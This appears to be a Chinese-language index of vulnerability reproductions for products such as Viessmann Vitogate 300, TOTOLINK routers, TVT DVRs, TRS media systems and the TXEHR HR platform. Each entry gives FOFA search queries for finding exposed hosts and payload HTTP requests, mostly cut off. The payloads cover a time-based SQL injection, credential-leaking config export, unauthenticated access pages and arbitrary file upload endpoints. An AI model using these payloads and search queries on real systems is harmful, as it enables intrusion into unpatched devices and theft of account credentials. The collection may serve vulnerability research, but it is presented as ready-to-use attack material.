V1-1Viessmann-Vitogate300-RCE 漏洞描述: Vitogate 300 组件/cgi-bin/vitogate.cgi中的一个问题允许未经身份验证的攻击者绕过身份验证,通过特制的请求执行任意命令,可导致服务器失陷。 影响版本: version <=** **2.1.3.0
U1-1usdtAdmin-收款管理系统-SQL 漏洞复现: payload: GET /index/index/send?query=select%20sleep(5) HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS
T24-1TVT-DVR-InformationLeakage fofa语法: fofa:“v\=20180615.01" src\="js/lib/require.js" type\="text/javascript” 漏洞复现: payload: POST /queryDevInfo HTTP/
T23-1TOTOLINK–InformationLeakage fofa语法: fofa:“TOTOLINK” 漏洞复现: 访问会下载一个xxxx.bat文件里面泄漏账号密码,可登录后台 payload: http://ip/cgi-bin/ExportSettings.sh
T22-1TOTOLINK-A3700R-PermissionAC fofa语法: fofa:“TOTOLINK” 漏洞复现: payload: http://ip/wizard.html http://ip/phone/wizard.html
T21-1拓尔思-TRS媒资管理系统-任意文件上传 漏洞复现: payload: POST /mas/servlets/uploadThumb?appKey=sv&uploadingId=asd HTTP/1.1 Accept: */* Content-Type: multipart/form-da
T20-3同享TXEHR-人力管理管理平台-SQL 漏洞复现: payload: POST /Service/SFZService.asmx HOST: SOAPAction: http://tempuri.org/GetEmployeeBySFZ Content-Type: text/xml;c
T20-2同享TXEHR-人力管理管理平台-任意文件上传 漏洞复现: payload: POST /MobileService/Web/Handler/hdlUploadFile.ashx?puser=.//Style/abcd HTTP/1.1 Host: {{Hostname}}
T20-1同享TXEHR-人力管理管理平台-PermissionAC 漏洞复现: payload: POST /Service/DownloadTemplate.asmx HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.1
T19-1拓尔思-TRSWAS5.0-PermissionAC 漏洞复现: payload: /mas/servlets/uploadThumb?appKey=sv&uploading=1
